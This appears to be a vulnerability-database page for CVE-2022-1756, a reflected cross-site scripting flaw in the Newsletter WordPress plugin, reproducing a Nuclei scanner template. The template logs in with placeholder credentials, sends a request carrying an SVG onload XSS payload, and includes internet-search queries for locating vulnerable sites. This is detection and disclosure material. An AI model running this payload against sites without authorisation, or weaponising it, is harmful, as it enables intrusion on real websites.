Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-1756
HistoryAug 17, 2023 - 7:49 a.m.

Newsletter < 7.4.5 - Cross-Site Scripting

2023-08-1707:49:11
ProjectDiscovery
github.com
6
cve
cve2022
wpscan
newsletter
xss
authenticated
thenewsletterplugin
wordpress
unityenginesanitized
request_uri
reflected_xss
malicious_scripts
data_theft
unauthorized_actions
fix_version 7.4.5

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

38.0%

The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.
id: CVE-2022-1756

info:
  name: Newsletter < 7.4.5 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.
  impact: |
    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: Fixed in version 7.4.5
  reference:
    - https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1756
    - https://wordpress.org/plugins/newsletter/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1756
    cwe-id: CWE-79
    epss-score: 0.00088
    epss-percentile: 0.37623
    cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: thenewsletterplugin
    product: newsletter
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/newsletter/
    fofa-query: body=/wp-content/plugins/newsletter/
    publicwww-query: "/wp-content/plugins/newsletter/"
  tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=newsletter_main_index&debug&"><svg/onload=alert(/document.domain/)> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "newsletter") && contains(body, "><svg/onload=alert(/document.domain/)>")'
        condition: and
# digest: 4a0a00473045022066fd5868b20fabdbad5e8588d78ccc536fbb44d968d54f3ca36e62e9e27b7441022100a02ce38eae6e56b6a3c5c605dcce609583946db59084d461e93a713704a7920d:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

38.0%